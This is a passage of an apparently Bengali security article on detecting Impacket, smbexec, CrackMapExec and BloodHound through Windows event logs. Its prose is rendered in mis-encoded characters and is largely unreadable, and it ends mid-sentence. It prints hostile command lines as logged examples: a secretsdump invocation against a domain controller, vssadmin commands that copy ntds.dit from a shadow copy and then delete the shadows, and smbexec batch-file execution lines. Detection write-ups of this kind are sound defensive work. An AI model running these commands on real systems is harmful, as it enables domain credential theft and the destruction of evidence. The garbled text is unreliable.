āĻāĻāĻžāĻĄāĻŧāĻžāĻ, āĻāĻ āĻŽāĻĄāĻŋāĻāĻ˛āĻāĻŋ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻāĻā§āĻ¨ā§āĻ āĻ˛āĻā§ āĻā§āĻ°ā§āĻ¸ āĻā§āĻĄāĻŧā§ āĻĻā§āĻ¯āĻŧ, āĻ¯āĻžāĻ° āĻāĻžāĻ°āĻŖā§ āĻāĻāĻŋ āĻ¸āĻšāĻā§āĻ āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻž āĻ¯āĻžāĻ¯āĻŧāĨ¤ āĻāĻĻāĻžāĻšāĻ°āĻŖāĻ¸ā§āĻŦāĻ°ā§āĻĒ, āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻžāĻ° āĻĢāĻ˛ā§
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
āĻāĻāĻ¨ā§āĻĄā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° 2016 āĻ˛āĻā§ āĻāĻŽāĻ°āĻž āĻāĻā§āĻ¨ā§āĻāĻā§āĻ˛āĻŋāĻ° āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻŽā§āĻ˛ āĻā§āĻ°āĻŽāĻāĻŋ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻŦ:
1. 4624 - āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻ˛āĻāĻ¨āĨ¤
2. 5145 - āĻāĻāĻ¨āĻ°ā§āĻ āĻ°āĻŋāĻŽā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ā§ āĻ
ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ā§āĻ° āĻ
āĻ§āĻŋāĻāĻžāĻ° āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻž āĻšāĻā§āĻā§āĨ¤
3. 5145 - System32 āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ¤ā§ āĻāĻāĻāĻŋ āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ
ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ā§āĻ° āĻ
āĻ§āĻŋāĻāĻžāĻ° āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻž āĻšāĻā§āĻā§āĨ¤ āĻĢāĻžāĻāĻ˛āĻāĻŋāĻ¤ā§ āĻāĻĒāĻ°ā§ āĻāĻ˛ā§āĻ˛āĻŋāĻāĻŋāĻ¤ āĻ°ā§āĻ¯āĻžāĻ¨ā§āĻĄāĻŽ āĻ¨āĻžāĻŽ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤
4. 4688 - āĻāĻāĻāĻŋ cmd.exe āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž āĻ¯āĻž vssadmin āĻāĻžāĻ˛ā§ āĻāĻ°ā§:
âC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻĻāĻŋāĻ¯āĻŧā§ āĻāĻāĻāĻŋ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻĻāĻŋāĻ¯āĻŧā§ āĻāĻāĻāĻŋ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻĻāĻŋāĻ¯āĻŧā§ āĻāĻāĻāĻŋ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Smbexec
āĻ āĻ¨ā§āĻ āĻĒā§āĻ¸ā§āĻ-āĻļā§āĻˇāĻŖ āĻ¸āĻ°āĻā§āĻāĻžāĻŽā§āĻ° āĻŽāĻ¤ā§, āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻā§āĻ° āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻŽāĻĄāĻŋāĻāĻ˛ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤ āĻāĻŽāĻ°āĻž smbexec-āĻ āĻĢā§āĻāĻžāĻ¸ āĻāĻ°āĻŦ, āĻ¯āĻž āĻāĻĒāĻ¨āĻžāĻā§ āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻŽā§āĻļāĻŋāĻ¨ā§ āĻāĻāĻāĻŋ āĻāĻ¨ā§āĻāĻžāĻ°ā§āĻā§āĻāĻŋāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻļā§āĻ˛ āĻĻā§āĻ¯āĻŧāĨ¤ āĻāĻ āĻŽāĻĄāĻŋāĻāĻ˛āĻāĻŋāĻ° āĻāĻ¨ā§āĻ¯ āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄ āĻŦāĻž āĻšā§āĻ¯āĻžāĻļ āĻ¸āĻš SMB āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻĒā§āĻ°āĻŽāĻžāĻŖā§āĻāĻ°āĻŖā§āĻ°āĻ āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨āĨ¤ āĻĄā§āĻŽā§āĻ° āĻāĻĒāĻ°. 3 āĻāĻŽāĻ°āĻž āĻāĻ āĻ§āĻ°āĻ¨ā§āĻ° āĻāĻāĻāĻŋ āĻā§āĻ˛ā§āĻ° āĻ āĻĒāĻžāĻ°ā§āĻļāĻ¨ā§āĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ, āĻāĻ āĻā§āĻˇā§āĻ¤ā§āĻ°ā§ āĻāĻāĻŋ āĻ¸ā§āĻĨāĻžāĻ¨ā§āĻ¯āĻŧ āĻĒā§āĻ°āĻļāĻžāĻ¸āĻ āĻāĻ¨āĻ¸ā§āĻ˛āĨ¤
āĻāĻžāĻ¤āĨ¤ 3. smbexec āĻāĻ¨ā§āĻāĻžāĻ°ā§āĻā§āĻāĻŋāĻ āĻāĻ¨āĻ¸ā§āĻ˛
āĻĒā§āĻ°āĻŽāĻžāĻŖā§āĻāĻ°āĻŖā§āĻ° āĻĒāĻ° smbexec-āĻāĻ° āĻĒā§āĻ°āĻĨāĻŽ āĻ§āĻžāĻĒ āĻšāĻ˛ OpenSCManagerW(15) āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻĻāĻŋāĻ¯āĻŧā§ SCM āĻā§āĻ˛āĻ¤ā§ āĻšāĻŦā§āĨ¤ āĻā§āĻ¯ā§āĻ¯āĻŧāĻžāĻ°ā§āĻāĻŋ āĻāĻ˛ā§āĻ˛ā§āĻāĻ¯ā§āĻā§āĻ¯: āĻāĻ¤ā§ MachineName āĻĢāĻŋāĻ˛ā§āĻĄāĻāĻŋ DUMMY āĻ¤ā§ āĻ¸ā§āĻ āĻāĻ°āĻž āĻāĻā§āĨ¤
āĻāĻžāĻ¤āĨ¤ 4. āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛ āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻžāĻ° āĻā§āĻ˛āĻ¤ā§ āĻ
āĻ¨ā§āĻ°ā§āĻ§ āĻāĻ°ā§āĻ¨
āĻāĻ°āĻĒāĻ°ā§, CreateServiceW (12) āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻžāĻāĻŋ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ smbexec āĻāĻ° āĻā§āĻˇā§āĻ¤ā§āĻ°ā§, āĻāĻŽāĻ°āĻž āĻĒā§āĻ°āĻ¤āĻŋāĻŦāĻžāĻ° āĻāĻāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻŦāĻŋāĻ˛ā§āĻĄāĻŋāĻ āĻ˛āĻāĻŋāĻ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ°āĻŋāĨ¤ āĻĄā§āĻŽā§āĻ° āĻāĻĒāĻ°. 5 āĻ¸āĻŦā§āĻ āĻ°āĻ āĻāĻŽāĻžāĻ¨ā§āĻĄā§āĻ° āĻ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ā§āĻ¯āĻŧ āĻĒāĻ°āĻžāĻŽāĻŋāĻ¤āĻŋ āĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻāĻ°ā§, āĻšāĻ˛ā§āĻĻ - āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§ āĻā§ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻāĻāĻŋ āĻĻā§āĻāĻž āĻ¸āĻšāĻ āĻ¯ā§ āĻāĻā§āĻ¸āĻŋāĻāĻŋāĻāĻā§āĻŦāĻ˛ āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ¨āĻžāĻŽ, āĻāĻ° āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋ āĻāĻŦāĻ āĻāĻāĻāĻĒā§āĻ āĻĢāĻžāĻāĻ˛ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻ°āĻž āĻ¯ā§āĻ¤ā§ āĻĒāĻžāĻ°ā§, āĻ¤āĻŦā§ āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻ āĻŽāĻĄāĻŋāĻāĻ˛ā§āĻ° āĻ¯ā§āĻā§āĻ¤āĻŋ āĻ˛āĻā§āĻāĻ¨ āĻ¨āĻž āĻāĻ°ā§ āĻŦāĻžāĻāĻŋāĻā§āĻ˛āĻŋ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻ°āĻž āĻ āĻ¨ā§āĻ āĻŦā§āĻļāĻŋ āĻāĻ āĻŋāĻ¨āĨ¤
āĻāĻžāĻ¤āĨ¤ 5. āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛ āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻžāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻāĻāĻŋ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻžāĻ° āĻ
āĻ¨ā§āĻ°ā§āĻ§
Smbexec āĻāĻāĻžāĻĄāĻŧāĻžāĻ Windows āĻāĻā§āĻ¨ā§āĻ āĻ˛āĻā§ āĻ¸ā§āĻĒāĻˇā§āĻ āĻāĻŋāĻšā§āĻ¨ āĻ°ā§āĻā§ āĻ¯āĻžāĻ¯āĻŧāĨ¤ ipconfig āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ¸āĻš āĻāĻāĻāĻŋ āĻāĻ¨ā§āĻāĻžāĻ°ā§āĻā§āĻāĻŋāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻļā§āĻ˛ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° 2016 āĻ˛āĻā§, āĻāĻŽāĻ°āĻž āĻāĻā§āĻ¨ā§āĻāĻā§āĻ˛āĻŋāĻ° āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻā§ āĻā§āĻ°āĻŽ āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ:
1. 4697 - āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ā§ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻāĻ¨āĻ¸ā§āĻāĻ˛ āĻāĻ°āĻž:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - āĻĒāĻ¯āĻŧā§āĻ¨ā§āĻ 1 āĻĨā§āĻā§ āĻāĻ°ā§āĻā§āĻŽā§āĻ¨ā§āĻ āĻ¸āĻš cmd.exe āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻžāĨ¤
3. 5145 - C$ āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ¤ā§ __output āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ
ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ā§āĻ° āĻ
āĻ§āĻŋāĻāĻžāĻ° āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻž āĻšāĻā§āĻā§āĨ¤
4. 4697 - āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ā§ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻāĻ¨āĻ¸ā§āĻāĻ˛ āĻāĻ°āĻžāĨ¤
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - āĻĒāĻ¯āĻŧā§āĻ¨ā§āĻ 4 āĻĨā§āĻā§ āĻāĻ°ā§āĻā§āĻŽā§āĻ¨ā§āĻ āĻ¸āĻš cmd.exe āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻžāĨ¤
6. 5145 - C$ āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋāĻ¤ā§ __output āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ
ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ā§āĻ° āĻ
āĻ§āĻŋāĻāĻžāĻ° āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°āĻž āĻšāĻā§āĻā§āĨ¤
āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻ¸āĻ°āĻā§āĻāĻžāĻŽāĻā§āĻ˛āĻŋ āĻŦāĻŋāĻāĻžāĻļā§āĻ° āĻāĻŋāĻ¤ā§āĻ¤āĻŋāĨ¤ āĻāĻāĻŋ āĻāĻāĻ¨ā§āĻĄā§āĻ āĻ āĻŦāĻāĻžāĻ āĻžāĻŽā§āĻ¤ā§ āĻĒā§āĻ°āĻžāĻ¯āĻŧ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻĒā§āĻ°ā§āĻā§āĻāĻ˛ āĻ¸āĻŽāĻ°ā§āĻĨāĻ¨ āĻāĻ°ā§ āĻāĻŦāĻ āĻāĻāĻ āĻ¸āĻžāĻĨā§ āĻāĻ° āĻ¨āĻŋāĻāĻ¸ā§āĻŦ āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤ āĻāĻāĻžāĻ¨ā§ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻāĻ¨āĻ°ā§āĻ āĻ āĻ¨ā§āĻ°ā§āĻ§, āĻāĻŦāĻ āĻāĻŽāĻžāĻ¨ā§āĻĄā§āĻ° āĻŦā§āĻļāĻŋāĻˇā§āĻā§āĻ¯āĻāĻ¤ āĻāĻ āĻ¨ āĻ¸āĻš SCM API āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°, āĻāĻŦāĻ āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ¨āĻžāĻŽā§āĻ° āĻŦāĻŋāĻ¨ā§āĻ¯āĻžāĻ¸, āĻāĻŦāĻ SMB āĻļā§āĻ¯āĻŧāĻžāĻ° SYSTEM32āĨ¤
CRACKMAPEXEC
CME āĻā§āĻ˛āĻāĻŋ āĻĒā§āĻ°āĻžāĻĨāĻŽāĻŋāĻāĻāĻžāĻŦā§ āĻ¸ā§āĻ āĻ°ā§āĻāĻŋāĻ¨ āĻ ā§āĻ¯āĻžāĻāĻļāĻ¨āĻā§āĻ˛āĻŋāĻā§ āĻ¸ā§āĻŦāĻ¯āĻŧāĻāĻā§āĻ°āĻŋāĻ¯āĻŧ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĄāĻŋāĻāĻžāĻāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§ āĻ¯āĻž āĻāĻāĻāĻ¨ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻā§ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻ āĻā§āĻ°āĻ¸āĻ° āĻšāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻ°āĻ¤ā§ āĻšāĻ¯āĻŧāĨ¤ āĻāĻāĻŋ āĻāĻĒāĻ¨āĻžāĻā§ āĻā§āĻā§āĻ¯āĻžāĻ¤ āĻāĻŽā§āĻĒāĻžāĻ¯āĻŧāĻžāĻ° āĻāĻā§āĻ¨ā§āĻ āĻāĻŦāĻ āĻŽāĻŋāĻāĻžāĻ°āĻĒā§āĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻāĻ¯ā§āĻā§ āĻāĻžāĻ āĻāĻ°āĻ¤ā§ āĻĻā§āĻ¯āĻŧāĨ¤ āĻ āĻĻā§āĻļā§āĻ¯āĻāĻžāĻŦā§ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯, CME āĻ¤āĻžāĻĻā§āĻ° āĻ āĻ¸ā§āĻĒāĻˇā§āĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄ (āĻāĻāĻāĻŋ āĻĒā§āĻĨāĻ āĻ°āĻŋāĻāĻ¨ā§āĻ¸āĻžāĻ¨ā§āĻ¸ āĻā§āĻ˛) āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§, āĻāĻāĻāĻ¨ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§ āĻāĻāĻāĻŋ āĻ¸āĻā§āĻ°āĻŋāĻ¯āĻŧ āĻĄā§āĻŽā§āĻ¨ āĻĒā§āĻ°āĻļāĻžāĻ¸āĻ āĻ¸ā§āĻļāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻ āĻ¨ā§āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨āĻāĻŋ āĻ¸ā§āĻŦāĻ¯āĻŧāĻāĻā§āĻ°āĻŋāĻ¯āĻŧāĻāĻžāĻŦā§ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤
āĻā§āĻ¯āĻŧā§āĻ¨ā§āĻĻāĻž
āĻāĻāĻāĻŋ āĻ¸ā§āĻŦāĻ¤āĻ¨ā§āĻ¤ā§āĻ° āĻšāĻžāĻ¤āĻŋāĻ¯āĻŧāĻžāĻ° āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄ āĻāĻĒāĻ¨āĻžāĻā§ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻāĻ¨ā§āĻ¨āĻ¤ āĻĒā§āĻ¨āĻ°ā§āĻĻā§āĻ§āĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĻā§āĻ¯āĻŧāĨ¤ āĻāĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§, āĻŽā§āĻļāĻŋāĻ¨, āĻā§āĻˇā§āĻ ā§, āĻ¸ā§āĻļāĻ¨ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻĄā§āĻāĻž āĻ¸āĻāĻā§āĻ°āĻš āĻāĻ°ā§ āĻāĻŦāĻ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ°āĻļā§āĻ˛ āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻ āĻŦāĻž āĻŦāĻžāĻāĻ¨āĻžāĻ°āĻŋ āĻšāĻŋāĻ¸āĻžāĻŦā§ āĻāĻ¸ā§āĨ¤ LDAP āĻŦāĻž SMB āĻāĻŋāĻ¤ā§āĻ¤āĻŋāĻ āĻĒā§āĻ°ā§āĻā§āĻāĻ˛ āĻ¤āĻĨā§āĻ¯ āĻ¸āĻāĻā§āĻ°āĻš āĻāĻ°āĻ¤ā§ āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻšāĻ¯āĻŧāĨ¤ āĻ¸āĻŋāĻāĻŽāĻ āĻāĻ¨ā§āĻāĻŋāĻā§āĻ°ā§āĻļāĻ¨ āĻŽāĻĄāĻŋāĻāĻ˛ āĻāĻĒāĻ¨āĻžāĻā§ āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄāĻā§ āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ā§ āĻĄāĻžāĻāĻ¨āĻ˛ā§āĻĄ āĻāĻ°āĻ¤ā§, āĻāĻāĻŋ āĻāĻžāĻ˛āĻžāĻ¤ā§ āĻāĻŦāĻ āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻžāĻ° āĻĒāĻ°ā§ āĻ¸āĻāĻā§āĻšā§āĻ¤ āĻĄā§āĻāĻž āĻā§āĻ°āĻšāĻŖ āĻāĻ°āĻ¤ā§ āĻĻā§āĻ¯āĻŧ, āĻ¯āĻžāĻ° āĻĢāĻ˛ā§ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽā§ āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻā§āĻ˛āĻŋ āĻ¸ā§āĻŦāĻ¯āĻŧāĻāĻā§āĻ°āĻŋāĻ¯āĻŧ āĻšāĻ¯āĻŧ āĻāĻŦāĻ āĻ¸ā§āĻā§āĻ˛āĻŋ āĻāĻŽ āĻ˛āĻā§āĻˇāĻŖā§āĻ¯āĻŧ āĻšāĻ¯āĻŧāĨ¤ āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄā§āĻ° āĻā§āĻ°āĻžāĻĢāĻŋāĻāĻžāĻ˛ āĻļā§āĻ˛ āĻā§āĻ°āĻžāĻĢ āĻāĻāĻžāĻ°ā§ āĻ¸āĻāĻā§āĻšā§āĻ¤ āĻĄā§āĻāĻž āĻāĻĒāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°ā§, āĻ¯āĻž āĻāĻĒāĻ¨āĻžāĻā§ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ āĻĨā§āĻā§ āĻĄā§āĻŽā§āĻ¨ āĻĒā§āĻ°āĻļāĻžāĻ¸āĻā§āĻ° āĻāĻžāĻā§ āĻ¸āĻāĻā§āĻˇāĻŋāĻĒā§āĻ¤āĻ¤āĻŽ āĻĒāĻĨ āĻā§āĻāĻā§ āĻĒā§āĻ¤ā§ āĻĻā§āĻ¯āĻŧāĨ¤
āĻāĻžāĻ¤āĨ¤ 6. āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄ āĻāĻ¨ā§āĻāĻžāĻ°āĻĢā§āĻ¸
āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ā§ āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯, āĻŽāĻĄāĻŋāĻāĻ˛āĻāĻŋ ATSVC āĻāĻŦāĻ SMB āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻāĻāĻŋ āĻāĻžāĻ¸ā§āĻ āĻ¤ā§āĻ°āĻŋ āĻāĻ°ā§āĨ¤ ATSVC āĻšāĻ˛ Windows Task Scheduler āĻāĻ° āĻ¸āĻžāĻĨā§ āĻāĻžāĻ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ āĻāĻ¨ā§āĻāĻžāĻ°āĻĢā§āĻ¸āĨ¤ CME āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§ āĻāĻžāĻāĻ°āĻŋ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻ¤ā§ āĻ¤āĻžāĻ° NetrJobAdd(1) āĻĢāĻžāĻāĻļāĻ¨ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ CME āĻŽāĻĄāĻŋāĻāĻ˛ āĻ¯āĻž āĻĒāĻžāĻ āĻžāĻ¯āĻŧ āĻ¤āĻžāĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻāĻŋāĻ¤ā§āĻ°ā§ āĻĻā§āĻāĻžāĻ¨ā§ āĻšāĻ¯āĻŧā§āĻā§āĨ¤ 7: āĻāĻāĻŋ cmd.exe āĻāĻŽāĻžāĻ¨ā§āĻĄā§āĻ° āĻāĻāĻāĻŋ āĻāĻ˛ āĻāĻŦāĻ XML āĻŦāĻŋāĻ¨ā§āĻ¯āĻžāĻ¸ā§ āĻāĻ°ā§āĻā§āĻŽā§āĻ¨ā§āĻ āĻāĻāĻžāĻ°ā§ āĻ āĻ¸ā§āĻĒāĻˇā§āĻ āĻā§āĻĄāĨ¤
āĻāĻŋāĻ¤ā§āĻ° 7. CME āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻāĻāĻŋ āĻāĻžāĻ¸ā§āĻ āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž
āĻāĻžāĻ°ā§āĻ¯āĻāĻŋ āĻ¸āĻŽā§āĻĒāĻžāĻĻāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻŽāĻž āĻĻā§āĻāĻ¯āĻŧāĻžāĻ° āĻĒāĻ°ā§, āĻļāĻŋāĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ āĻ¨āĻŋāĻā§āĻ āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄ āĻļā§āĻ°ā§ āĻāĻ°ā§ āĻāĻŦāĻ āĻāĻāĻŋ āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻĻā§āĻāĻž āĻ¯āĻžāĻ¯āĻŧāĨ¤ āĻŽāĻĄāĻŋāĻāĻ˛āĻāĻŋ āĻ¸ā§āĻā§āĻ¯āĻžāĻ¨ā§āĻĄāĻžāĻ°ā§āĻĄ āĻā§āĻ°ā§āĻĒ, āĻĄā§āĻŽā§āĻ¨ā§āĻ° āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻŽā§āĻļāĻŋāĻ¨ 